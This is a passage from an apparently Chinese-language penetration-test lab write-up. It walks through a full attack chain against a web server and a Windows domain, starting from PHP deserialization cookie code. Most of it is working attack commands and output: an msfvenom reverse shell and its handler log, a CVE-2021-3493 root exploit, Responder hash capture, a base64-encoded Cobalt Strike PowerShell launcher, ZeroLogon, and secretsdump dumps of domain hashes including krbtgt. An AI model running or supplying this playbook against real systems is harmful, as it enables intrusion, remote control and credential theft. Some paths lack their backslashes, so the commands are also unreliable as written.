            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp,$this -> crypt_key));
    }

    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt),$this -> crypt_key);
        $tmp = '';
        for($i = 0;$i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt,$encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this -> crypt_key = null;
    }
}

function get_cookie($name, $key = '') {
    $key = 'P4tzizR6d';
    $key = md5($key);
    $sc = new CommonLibSysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}

function set_cookie($args, $key = '') {
    $key = 'P4tzizR6d';
    $value = serialize($args);
    $key = md5($key);
    $sc = new CommonLibSysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}

$b = new ThinkImageDriverImagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);

在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问

http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/www_xycms_com.xyh_guestbook.php

在这里插入图片描述

终于进来了。

4.linux提权

4.1 绕过宝塔命令执行

在这里插入图片描述

bt 禁止命令执行 可以通过 插件进行绕过 tmp目录下有这个文件 /tmp/php-cgi-56.sock
在这里插入图片描述

可以执行命令了。

在这里插入图片描述

4.2 宝塔系统特权提升

首先反弹一只shell 这里用msf

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.168 lport=12345  -f elf -o shell
chmod +x shell
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 12345
lport => 12345
msf6 exploit(multi/handler) > set lhost 192.168.0.168
lhost => 192.168.0.168
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.0.168:12345 
[*] Sending stage (3020772 bytes) to 192.168.0.160
[*] Meterpreter session 1 opened (192.168.0.168:12345 -> 192.168.0.160:59870 ) at 2022-05-07 08:55:03 -0400

meterpreter > 

在这里插入图片描述

切换shell python3 -c 'import pty;pty.spawn("/bin/bash")'

/www/server/panel/data/default.db 这个是宝塔的数据库文件,里面存宝塔的配置信息 包括账号和密码等敏感信息,但是当前的权限无法访问。

在这里插入图片描述

4.3 CVE-2021-3493 提权 ubuntu18.04

最后通过这个cve的exp成功提权到root 下载地址 https://github.com/briskets/CVE-2021-3493

gcc -o exploit exploit.c
chmod +x exploit

在这里插入图片描述

4.4 hashcat 破解 /etc/shadow

root:x:0:0:root:/root:/bin/bash
web1:x:1000:1000:web1,,,:/home/web1:/bin/bash
db:x:1003:1003:,,,:/home/db:/bin/bash
web1:$6$gqtH0Rj2$lxbeVfR7GZMvClPiLmvoOWB6DKjYb0kJe2hVY3IxE6v5qG/C.NhZsBYTPWNkAGxvj7.ETMbwUrssClfI31JG1.:19118:0:99999:7:::
db:$6$Min6QwNX$tpa7Je0y5YhyswU9qtFI7Rh7KN3nI3bNIl.1WKTzhXuSlVvUTetUrpk27Jj8rIQzoPG3GWKLIA78pcW8ZSMfR/:19118:0:99999:7:::

hashcat -m 1800 -a 0 -o found.txt hash.txt rockyou.txt

成功破解 一个用户密码

$6$Min6QwNX$tpa7Je0y5YhyswU9qtFI7Rh7KN3nI3bNIl.1WKTzhXuSlVvUTetUrpk27Jj8rIQzoPG3GWKLIA78pcW8ZSMfR/:db123456

5.内网渗透

5.1 对目标信息收集

根据提供的拓扑扫描指定ip 192.168.0.165

└─$ nmap -sV -A 192.168.0.165 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 12:32 EDT
Nmap scan report for 192.168.0.165
Host is up (0.00052s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2012 11.00.3128.00; SP1+
| ms-sql-ntlm-info: 
|   Target_Name: SCANER
|   NetBIOS_Domain_Name: SCANER
|   NetBIOS_Computer_Name: DB
|   DNS_Domain_Name: scaner.sec
|   DNS_Computer_Name: db.scaner.sec
|   DNS_Tree_Name: scaner.sec
|_  Product_Version: 6.3.9600
|_ssl-date: 2022-05-07T16:34:22+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-05-05T15:49:41
|_Not valid after:  2052-05-05T15:49:41
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info: 
|   192.168.0.165:1433: 
|     Version: 
|       name: Microsoft SQL Server 2012 SP1+
|       number: 11.00.3128.00
|       Product: Microsoft SQL Server 2012
|       Service pack level: SP1
|       Post-SP patches applied: true
|_    TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.43 seconds

只开放了1433端口 而且可以看到这个主机可能存在于域内 db.scaner.sec

hydra -L user.txt -P top1000.txt 192.168.0.165 mssql -vV -f -o ok.txt

使用top1000失败 使用指定密码db123456 也是失败的。 如果这样都失败考虑一下 是不是域用户登录mssql。

5.2 域用户身份登录mssql

─$ python3 mssqlclient.py scaner/db:db123456@192.168.0.161 -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DB): Line 1: 已将数据库上下文更改为 'master'。
[*] INFO(DB): Line 1: 已将语言设置更改为 简体中文。
[*] ACK: Result: 1 - Microsoft SQL Server (110 1256) 
[!] Press help for extra shell commands
SQL> 

成功登录执行 enable_xp_cmdshell 发现用户权限较低

     
SQL> enable_xp_cmdshell
[-] ERROR(DB): Line 105: 用户没有执行此操作的权限。
[-] ERROR(DB): Line 1: 您没有运行 RECONFIGURE 语句的权限。
[-] ERROR(DB): Line 62: 配置选项 'xp_cmdshell' 不存在,也可能是高级选项。
[-] ERROR(DB): Line 1: 您没有运行 RECONFIGURE 语句的权限。
SQL> 

5.3 利用Responder进行NTLMV哈希的窃取

使用 responder选择网卡进行抓包 一定要加上-v 不然只会抓一次

sudo responder -I eth0 -v    

在这里插入图片描述

在SQL上执行 目的是让他取访问kali

 exec xp_dirtree '\192.168.0.168test',0,1;

此时kali抓到哈希了。类型是ntlmv1

在这里插入图片描述

DB$::SCANER:4088726E576881AF00000000000000000000000000000000:CA91B65F4CDFD004E2A91146B3B805CDDDD05FBD30BD4F18:aea11808f69bdb1e 

5.5 hash 破解 ntlmV1

hashcat -m 5500 DB$::SCANER:4088726E576881AF00000000000000000000000000000000:CA91B65F4CDFD004E2A91146B3B805CDDDD05FBD30BD4F18:aea11808f69bdb1e top1000.txt -o found.txt --force

在这里插入图片描述

密码是 freepass

使用 mssqlclient 输入密码进入mssql服务

└─$ python3 mssqlclient.py sa@192.168.0.161 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DB): Line 1: 已将数据库上下文更改为 'master'。
[*] INFO(DB): Line 1: 已将语言设置更改为 简体中文。
[*] ACK: Result: 1 - Microsoft SQL Server (110 1256) 
[!] Press help for extra shell commands
SQL> 

在这里插入图片描述

可以正常执行命令了 但是权限还是 nt servicemssqlserver 比较低的权限 需要进行提权。

5.6 cobalt stike 上线

xp_cmdshell powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADIALwBpAFMAaABMADkASABIADYARgBQADAAUQBDAEIAQwBHADgAQQA3AE0AYQA2AFIAbwB3AFkATQBEAG0AWQBWADQAaABOADQAcQBNAHUAMgAxAHMAagBCAC8AZABiAGIAQwA1AE0ALwAvADkAbABnADMAawBaAG4AWQB5AHUAeQBQAHQASQBpAEcAMwB1ADYAdQBxAHEAMAA2AGQAcgBpADQAcgBtAEQAMABvAGoASgBnAGEAawAxAHkARQB1AFkAYwBsAEoAdABSADAASABhADYAYwBTAHQAMQAzAFgASgBGAHgAWAA3AGsALwAwAGkAawA5AGMARABRAFcAVAA4AGUARABOAHcATwB6AE4ANAArADQAMgBwAHUASwBFAE0ARwBVAGMAbgArAGwANwBpAFkAcQBVAFEAOQBjADUAdgA2AG8AawByAGUARABpAHcASQBiADUANwBuAGsASgBSAGIARQBLAEMAQQA0AGUAMwBlAFgAdQBrAHUAbQBBAG8AZQBxAE8AbgA1AHoAVgBHAFkAZQA4AGQAcwBCAHMANQAyAEwASwBHAHkAVQBlAGUARQA5AHIAKwBNAGUAVgBOAE4ANQAvAGYASwBsAEgAUgBDAEMASABYAFoANQBMAC8AUQB3ADQAeQBuAEYAaAA2ADEAdABZAHAAcgBKAGMAdAArADQAMQBRADQAVAAvAEQARABlAFcAbABoAGoAMwBGAC8AYwAvAFYAdQBoAFoANwB0AGIAMQBiADYASwBSAFcAMQBWADIAMABGAEEAdgBJAFAAaQB0AFoARwByAHEAWABFAEUAQgBjAFcAegBUAFoAWgBKAC8ALwBsAG4ATwB2AHYAeQBVAEgAbwB0AEMASAA2AGcAMgBqAFMAVABWAGkATABLADgASwBHAEEAYgBEAHUAZAA1AGIANQBuADQAdwAzAG4AawBZAGMAegBhAGMAbgBVAGkARQB0AGQAbgBSAFYAVwBwAGwATQBwAEYAeABhAEoAOQAzAEwAaQB2AEgAVAB4AFAAWgAyADkAUgBtAFoANABLAHMAVAB4ADYAeQBCAGoAcQB4AGUAZABUAEIAcQBHAEUAOABDAEcAdgAyAEMAWQB6AG4ATQB2ADgAWAA0AHYAcgA2AC8AYwBIACsALwBlAHoAQQBLAEgAbQBRAGQAYwBFAEIAMgBHAGkAZQBzAHAAbQBCAHgATgBEAGQATgBDAFgAMwBXAFEAagBXAGQAWQBCADcAVQAwAGgAZgBRADUAUgBqAG8ATABUAGgARABNAEEAdQBKAHcATgAxADkAQQA3ACsAagB1AGMAZQBiAGUAQwBXAHcANwBEADMAWgBmAGYAdABmAHUAYQAwAGIARwBwAHgAdQA0AHYANgB1AFUAKwBhAGcARQBVAGgATgBHAHMAdgBrAHIASgAzADQASABEAGkAbgBoAHoAYwBVAGMAaABQAE8AVAA5AHgALwBJAGwAWQBYAGYAVAB3AFQATABwAHIANgBuAFAAcQBFAHEAdwBqAFkAMgBWAEkAYgBmAEcATwBEADcAZwBhAHUAcAB1ADcAdQBYAFoASQBnAGgAbgBzAHoARQBwAFcAYQBpADkANQBVAHIANQBqAGsASgBuAEYAQwBaAFMANgBJADQAbgBYAE0AUwA0AE8AegByAFAALwBtADUAYgBIAHYAVABwAFAAbABmAEcAaQByAGQAdABLADQANgBsAC8AUgBjAC8AUABqAEsAdgBTAHgAZABFADcAMgBtADcAcgBLAHAASwAzAHYAaQArAGIAZAB0AFkATgBvAEkAawAzAGoAOQAxADYAZQBoAGcAMwBYAFQAdwBaADMASQBVAFEAKwBtAGQAaQBOADgANQByAE8AYwBZAGQAMwBHAEMAUgA2AEYAbQA1AGcATQBmAG0AYgBTADEAdwBXAE0ATwBsAGQAMAAwAGoARwBnAEwAegArAHIAQwBRAGUAVAB2AGUAdQAyAEwAcwA3AHgARwB1AFMAZABnAGwAZABBAGkAZQB5AFAAegBsAHgAeQBtAEUAbQBMAGoAbwBRAFAAZwBOAC8AbABIAFcAaAA2AHIAOABNAHgAdwB6AGYAcAA2ADkARwBLAGIAcgB2AEgANwB6AEcAWAAyADcAWgBLAGEAWgA2AGIAQgBIAEQATwB0AFQAeQBuAFkATgBYAEcASwBNAC8AeABEAGoAVwB2AFMAMwB6AEEAMwBHAFMAWQAvAHMAZABkAEsAYgBDAFoAcQBhAG0AVQAzAGMAeQA5AFoAagArAEIAOQBMAHAAMQAyADMAWABnAHgAQQBRAGEAWgBCAGQAZwBtAEMAcwBlADEAawB6AFYAagBsAEgASgBjADMAMABUADQAVgBhAGsAbQBNAGIATgBoAGYAUwBuAG0ATABSAFYAMgA0AFkAagBCADUAYQBPAGsAQgBPAFkAaQBiAEYAUQBXAE0AdwBaAGcAdgBMAC8AegBvADkAcwBRAGMARgBNAFAASABnADIAUABvAEIAMABVAG8AVwA2AHQAbQBwAEEAegBiAG0AZQBxAEkAUgB1AHEAbwBGAFIAKwBqACsANABmAFQAcwBuAGwAMABNAFIAWQAzAFUARAA2AFkAUABUAFEAQQBEAEYAZABsAG0AZQBXADUAcQBFAFEAVgAxAEwANQAzADgAaQAzAHYALwBtADMAbwA4AGwANQBnAGMAMwAyAHcAUgBmAEUANQBsAEoARAB1AEoATABLADIATAB4AGMAVQBrAGsAdABmAGgAeQArAGYAcQBPAFoAWQBJAGMAWQBZAEIAYQBsADcAaQBIAGwAawBwAHgAdgBhAG8AawBaAFMAeQBUAHIAagBRAEMAWAA0AHcAawBhADEAbwBuAFAAZQBIAFkANwBmAHQAOQBZAFEANwAvAEkALwB3AHIAZgBsAGMAWQBqAFEAWQB6AHIAegBVAGIAYQBVAEkAdwBuAHYAUwBMAEEAMQAyAGMATgBqAHIAVgA0AEIAUwBJAHcAYgB4AFYAcgBIAFMATABJAEgAZgAyAGUANABJAHUASABzAGYAdQBjAHkAawA0AFYARQB2AEkARQA0ADgAeQB6AE4ARQBuAHYAMAA4ADcANAByAEgARAA5ADgAdQArADIANgAwAGIAWgB2AE4AcQA1ADYASQAvADMAWgA1AEsAMgA3AFgAWQBmAGQAcgAyAHUAdABYACsAawBuAFoAagArAGIANQA0AGIASABYADkAZAB0AE8ARgA4AGEATgA0AGIATABzAEQAMABHAHYAVQBQAGEAZAAxAFEAbABVAHMARABPAHAANABQAGQASgBPAEYAZABiAEEAcQBoAEYARwB3ADIAVgBPAEsAWgBaADYAeQAwAGcAZQBMAFEAVgBQAFYAaAB3ADAAMgBwAGEAbQAzAFkARgA4AEwAZwBzAHMATABLAEwAKwByAEkAZwBFAHUAawBGAEwAWAA2AGgATQB0AGsATQBQADQAaABRAHIAaABsAEoAMwBCAHAARwBpAHQAQwBKAHQAVAA3ADIAeABJAGwAbABhAFgAeAA2AGgAbwBkACsAbwBvAFgATQA1ADYAcwBwAFYAdwBDAEYAVQBJAG0AbgAzAFgARQBlAGgAdAB1ADYAZQB0AEwAVQA4AGkAdgByAFAAYwBnAC8AcwArAHMASABLAHEAUABZAGwAcABRAEsAMgBGAFIAUwBlADAASQBLAE8AQgAzAFAAMgBYAEoAbQBvAGgAMgBvAFUATwBkAFcAMgBhAEkAbgBoAFMAUABQAFkAYwBqADIAbwBFAHoAVgBxAGUAeQBNAFQAYgAxAHMANgBpADMAVQBIAG8ANAAwAHgAYQBBAHIAcwA0AHAAKwBpAHoAQwBJAEUAdAB1ADMAKwB2AEQATQBFADIAMAA1AGIAawBpAEEAWABhAHEAMgBMAEYAeQBBAHoAcABDAGIAWQBhAGgAQgBmAE4AQwBVAHIAcQBsAHQAYQBSAFQANQBKAHMAKwBWAHkAMwB6AFAAbABoAHAASABUADIANQB0ADkAegBvADQAQwB4AEgAcgBCAGIAdQBCAFkALwBtADcAdgBEADAAZQAxAFIAKwArAG8AYgBjAGYAaQBSAG8AegBDAGMAYQAxAHQAVgBzAEoAeQBuAFQAeAByAGEANwBJADUAagArAHUAVABhAHQAaABwAHQAMAA2ADIAVgBhAE0AVwBiADkAUQBXAEoAYwBWAGMANABpAGwAZgBEADcAWABSAG8AegAvAFAAbQBmAFIAYwBFAGkAcgB5AE8AZAB6AFcASAA4AFgASwBaAGoAcQB6AGgAZgBIAHoAZgB0AGEAYgBMADcAVQBOAFgANgA1AEoAcQA0AFUAMwBtAFIAZABGAHEAWABzAHEAegB2AGsAVAA0ACsAZABDAGIAVAA2ADEAMABYAEMANgBhAFAAWgA2AHYAQgB4AG8AUABlAC8AQQBoADEATgBaAEMASQAwAE8AZwBuAHoATQBpAHUARgBpAHcAYwBzAE0AbgBhAFIAVgBaAHkAWQArADgAeABVADAAVQAvAFkAbwB0AHAAZgBZAGEASgB0AFYAVAB6AHkASgAzAHMANQBUAEYAbAB0AFUAbgBSAEIARABSACsATgA1AFUAMwBtAGUAYQArAHUAegA1AGMAcwB0AFEAbgBQADgAcwBYAHMATwB4AE0AZQBhAFcASgBRAGYAZQBlAEUAMAB6AGEAMwBWAHEAaABCAE8AbABaADIANgB0AEQAcgBIAFoAbABPAFAAbQBwAHMATgBZAGoAYgBaAHUAOAAzAEkASwB0AFUAYgBKAHQARwAzAC8AVgByAEQAbgA4ADkAeQA5AGUATgAwAHUAQgBsAE4AcgBYADEANQAwAHgAbwBKAGoANABJAGMATgB1AHUAVwBwAFYAUwBGAFUALwBWAHcAbgB2AEoAbQA2ADMAbQBXAHMAeQBtAC8ARQBtAHAAVQAxAC8AZgByADgASABTAGMANwBUAG8ASABxAHQAaQBDADcAawA2AGUAYwA2AHUAVgBVAFAAYgBuAFAAVwBsAEsAMABNAFkAdwBwAE8AWgBjAG4AcAAvAE8ANQA4AGUAbgBzADkAUQBxAEcAcwBQAEsAWQBOAEwAYQBTADgASwBnAC8ANgBnAHkAWgBLAHEAbgBvAE4AeABkAFQANgBiAFYAZgBjADAAOQBpADcASgBiAGEALwBSAFEAVQB6AGkAcwBEAGQAYwBGADEAbgBxADAAdAAwAEwAYQBjAFcARgB0AEgAQQB1AHIASABXAE4AUwBYAFAAcwA3AFEAOQBTAGUAOQBGAFgAUAB4AGsAdABLADIAagAzAGMAYwBmAG8AVABNAHAAMQB0AFcAdgByADQAUwBCAC8ASAA0ADUAWgBnAFMAQwB2AE4AdwBpAHMAbABxAGsAMgBOAGwAcQBqAHQAbABqAHoAdwB2AEYAaABUAFcAdwBoADQAcQBxAHoAawBrAFgAZwBHAFAAaABlAHAASgBaAFkAbABDAHcAbgBzAGEAVgBmAHAAOQBJAEMASABwAHcAUAB3AEIAWABoAGsANQBwAHoAQgB5AGEAZgBBADAAMABqAHEAaQBKAEUAYwBjAHoAVgBrAEsAbQBrAGwAWABDADMAcAB0AHQAKwBlAG0AdABYAGgAMQBsAHIAUwB6AFYATgBWAEMAbwBZAFYAZAB0AGEARQBuAFQAdQBEAFgAQwAxADcAawBKAC8AawBHAGMAawArAFUALwBwAGgAWABJADEAMABsADAAQgAvAEUAYwBaADMAOQByADgANABlAEQANwBZAGoASAB1AHYATgAxAEIAbABvAEkARABGADgANwBsAGMATgByADcAMwAzADEAZABlADcAcwBQAFgAVwA1AC8AMgAvAHYANgB3AEQAYwBGAGEAcABSAGIAWAByAG0AVABsAHEASAA2AG8AVwBMADkAcQBmAGkAUwBWADAASgAxAHEAUQB5AFcARABCAHUAWgAyAC8AWABSAGQAMAByADIAMgBJAFIAUABYAGoARABVAHkAbQBjADgANwA1AHoAMABtAEQAcgBhAGgAcQA0AFMAKwA4ADEAYQAwAGUAZAB0ADIAdABiAGgAeAArAGsAVQBIAEEAMgAzAGMAcABiAGwANgBoAGMAdABwAEEAYwBOAEsAKwBkAE4AUgBsAG4AcwBYAGgARwA3AHAARQB0AE0AMgAwAFAAVwBrAHUAYgBoAEcAZQBPAHUAeABiAG8ASgBmAHYAbQB3AGcAdgBQAHcASABFAEUAZgBZAE0AZABnAHUAegB4AFgARABTAHIARgBZAGoASgAvAFYAWQBqAGIAMQArADcAQwAwAFgAUwAvAEsAdgBKAHYATAB4ADgAMwBWAEIAMAA4ACsANwBtAFEAbgBPADIAVwB2ADYASgBQAEEATwBlAEQALwBZAHcASgArADIAUABTAC8AUQB4AHUARABsAC8AUgBuADcAOQBBAGwARABuADIATwBWAHoAYQBWAC8AaQBPAFYARQBuAFgAdQB3AHoAdwAxAHoALwBEADEAZwBYADIAdQBrAFgAQwBQAEEAcwAzAFoAZwArAFYAdQA0AFYATQBsAHUAWABzAHoAOQAyAHEAVwBFADQAVQAxAGQANgA5AHkAMwA3AGsASABDAEkAKwBuAGwAVABKADgAcgB4AEEAagBpAEMAOQBpADcAdgBMADUAOQBZADAANwBxAGUAWgBGADgAUgBzADMAdwB4AHEARwA5AHYAbABoADQARwA2AEIAcABSAGoANgBxAGQAaAAwAFkAaQBRAFcAaAByAG0ALwBBAGMALwBNAHYAOABMAFAARABRAEEAQQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==

在这里插入图片描述

使用 ms16075 提权 到system

在这里插入图片描述

抓取凭证

* Username : DB$
* Domain   : SCANER
* NTLM     : 936a440598db1c326ad86ba68d73370d
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e7d7b11f5b4352988cddcd12daa1510:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

6.内网域渗透

6.1 查找域控

[*] Tasked beacon to import: D:pentestcsCS插件.powershellPowerView.ps1
[*] Tasked beacon to run: Get-NetDomainController (unmanaged)
[+] host called home, sent: 236001 bytes
[+] received output:


Forest                     : scaner.sec
CurrentTime                : 2022/5/8 1:19:37
HighestCommittedUsn        : 13392
OSVersion                  : Windows Server 2012 R2 Standard
Roles                      : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain                     : scaner.sec
IPAddress                  : 10.10.10.135
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback : 
InboundConnections         : {}
OutboundConnections        : {}
Name                       : ad.scaner.sec
Partitions                 : {DC=scaner,DC=sec, CN=Configuration,DC=scaner,DC=sec, CN=Schema,CN=Con
                             figuration,DC=scaner,DC=sec, DC=DomainDnsZones,DC=scaner,DC=sec...}

6.2 开启代理访问域控

beacon> socks 1088
[+] started SOCKS4a server on: 1088
[+] host called home, sent: 16 bytes
sudo vi /etc/proxychains4.conf
proxychains4 nmap 10.10.10.135 -p 88 -sT -Pn                                              
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 22:20 EDT
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:88  ...  OK
Nmap scan report for 10.10.10.135
Host is up (0.011s latency).
PORT   STATE SERVICE
88/tcp open  kerberos-sec

6.3 ZeroLogon(CVE-2020-1472) 提权域控

CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码,之所以不直接使用坏控凭证远程执行命令,是因为城控账户是不可以登录的,但是域控具备Dc sync权限, 可以获取域内任意用户的凭证。

漏洞利用过程中会重置域控存储在域中(ntds.dit)的凭证,而域控存储在域中的凭证与本地的注册表/lsass中的凭证不一致时,会导致目标域控脱域,所以在重置完域控凭证后要尽快恢复。

└─$ proxychains4 python cve-2020-1472-exploit.py ad 10.10.10.135
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:49158  ...  OK
=====================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
proxychains4 python3 secretsdump.py scaner/ad$@10.10.10.135 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:49155  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.secdb:1106:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
scaner.secmoonsec:1109:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12SERVER-DB$:1107:aad3b435b51404eeaad3b435b51404ee:3ebf8c0281893b7661e0897d434fd900:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460
krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20df
krbtgt:des-cbc-md5:91f2ab6198c1adf2
scaner.secdb:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5
scaner.secdb:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251
scaner.secdb:des-cbc-md5:f2cd2c3bceae0dcd
scaner.secmoonsec:aes256-cts-hmac-sha1-96:39054a2b86cb867177d23678dd40f2cfe89eaaa69f4a5e36725585cc0ad2faac
scaner.secmoonsec:aes128-cts-hmac-sha1-96:fee3562d30d7a5556e87962382c828c6
scaner.secmoonsec:des-cbc-md5:f1160b49cd8654e5
AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930
AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948
AD$:des-cbc-md5:e6fd2cae86c479fb
12SERVER-DB$:aes256-cts-hmac-sha1-96:2caf760f94b8b8c25d33ae599748f5f9e8a9b7770dd79cde858276b4c22cb423
12SERVER-DB$:aes128-cts-hmac-sha1-96:43aa58ec20e5067c32f81d7827e0d786
12SERVER-DB$:des-cbc-md5:97cb313b2931c7c7
[*] Cleaning up... 

6.3 登录域控服务器

proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb Administrator@10.10.10.135

在这里插入图片描述

6.4 设置cs转发

在这里插入图片描述

6.5 获取域控权限

记得关闭防火墙

netsh advfirewall set allprofiles state off  #关闭防火墙
netsh advfirewall show allprofiles           #查看防火墙状态
shell net use \10.10.10.135ipc$ "QWEasd000" /user:scaneradministrator
shell dir \10.10.10.135c$
jump psexec64 10.10.10.135 rve

在这里插入图片描述

6.6 恢复域控密码

导出文件

reg save HKLMSYSTEM system.save
reg save HKLMSAM sam.save
reg save HKLMSECURITY security.save
get system.save
get sam.save
get security.save
del system.save
del sam.save
del security.save


python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x3598ef959977a32edee6a7e37fa84031
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
